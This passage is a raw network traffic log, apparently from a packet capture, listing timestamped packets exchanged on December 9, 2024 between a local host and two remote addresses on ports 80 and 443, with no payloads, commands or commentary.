Dec 9, 2024 08:08:24.379096985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.383801937 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.383852959 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.383877993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.383915901 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.388626099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.388665915 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.388670921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.388704062 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.393445969 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.393490076 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.393591881 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.393639088 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.398314953 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.398361921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.398366928 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.398406029 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.403119087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.403163910 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.403201103 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.403240919 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.407977104 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.408026934 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.408063889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.408103943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.412769079 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.412841082 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.412900925 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.412950039 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.417608976 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.417670012 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.417706966 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.417759895 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.422507048 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.422524929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.422550917 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.422566891 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.426248074 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.426295042 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.426414013 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.426456928 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.430099010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.430138111 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.430174112 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.430214882 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.433890104 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.433938980 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.433979988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.434026957 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.437810898 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.437832117 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.437864065 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.437876940 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.441466093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.441517115 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.441572905 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.441631079 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.445303917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.445318937 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.445365906 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.445386887 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.464086056 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.464107037 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.464163065 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.464179993 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.464198112 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.464221954 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.480860949 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.480874062 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.480912924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.480931044 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.529519081 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.529539108 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.529644966 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.529666901 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.529711008 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.553510904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.553555965 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.553673983 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.553673983 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.555094957 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.555143118 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.555274010 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.555320024 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.558089018 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.558135033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.558199883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.558244944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.561177969 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.561223984 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.561285973 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.561331987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.564287901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.564335108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.564413071 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.564460993 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.567406893 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.567449093 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.567522049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.567565918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.570422888 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.570470095 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.570545912 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.570590019 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.573515892 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.573563099 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.573596954 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.573637009 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.576555014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.576598883 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.576689959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.576735020 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.579631090 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.579677105 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.579731941 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.579780102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.582704067 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.582753897 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.582808971 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.582854986 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.585617065 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.585661888 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.585725069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.585764885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.588594913 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.588641882 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.588670969 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.588711023 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.591553926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.591576099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.591597080 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.591638088 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.594343901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.594396114 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.594453096 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.594499111 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.597254038 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.597299099 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.597316027 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.597363949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.600130081 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.600178957 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.600214005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.600259066 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.603189945 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.603251934 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.603265047 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.603306055 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.605962992 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.606005907 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.606093884 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.606251955 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.608812094 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.608866930 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.608927965 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.608974934 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.610831976 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.610878944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.610913992 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.610959053 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.612890005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.612932920 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.612936974 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.612987041 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.614927053 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.614976883 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.615031958 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.615082979 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.616935968 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.616985083 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.617008924 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.617055893 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.618993044 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.619044065 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.619142056 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.619191885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.621045113 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.621092081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.621179104 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.621225119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.623102903 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.623157024 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.623177052 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.623215914 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.625138998 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.625190020 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.625228882 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.625273943 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.627187014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.627252102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.627286911 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.627326012 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.627962112 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.627986908 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.628046036 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.628058910 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.628099918 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.629199982 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.629240990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.629261017 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.629296064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.631230116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.631274939 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.631355047 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.631395102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.633285046 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.633327961 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.633364916 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.633407116 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.635593891 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.635637999 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.635977030 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.636017084 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.637358904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.637403011 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.661205053 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.661221981 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.661317110 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.661326885 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.661366940 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.693646908 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.693670034 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.693831921 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.693840981 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.693878889 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.741985083 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.742007017 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.742080927 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.742105007 CET	443	49786	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:24.742147923 CET	49786	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:24.745568991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.745632887 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.745678902 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.745717049 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.746484041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.746522903 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.746586084 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.746637106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.748184919 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.748224974 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.748884916 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.748929024 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.748964071 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.749006033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.750678062 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.750721931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.750808001 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.750849009 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.752440929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.752485991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.752492905 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.752526045 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.754237890 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.754283905 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.754368067 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.754411936 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.755918026 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.755964041 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.756019115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.756062984 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.757612944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.757658958 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.757797956 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.757843018 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.759282112 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.759322882 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.759366035 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.759412050 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.760926008 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.760971069 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.761034012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.761077881 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.762602091 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.762646914 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.762801886 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.762850046 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.764230967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.764276981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.764314890 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.764357090 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.765810013 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.765861034 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.765923023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.765966892 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.767523050 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.767570019 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.767774105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.767817020 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.769093037 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.769139051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.769200087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.769244909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.770745039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.770790100 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.770827055 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.770867109 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.772367954 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.772418022 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.772526026 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.772567034 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.774018049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.774061918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.774136066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.774175882 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.775774956 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.775788069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.775816917 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.775831938 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.777265072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.777314901 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.777380943 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.777425051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.778913975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.778959990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.779027939 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.779069901 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.780522108 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.780567884 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.780620098 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.780664921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.782181025 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.782228947 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.782352924 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.782399893 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.783917904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.783967018 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.783972979 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.784018040 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.785442114 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.785494089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.785528898 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.785571098 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.787075043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.787123919 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.787156105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.787205935 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.788749933 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.788799047 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:24.788872957 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:24.788921118 CET	49807	80	192.168.2.4	185.215.113.16
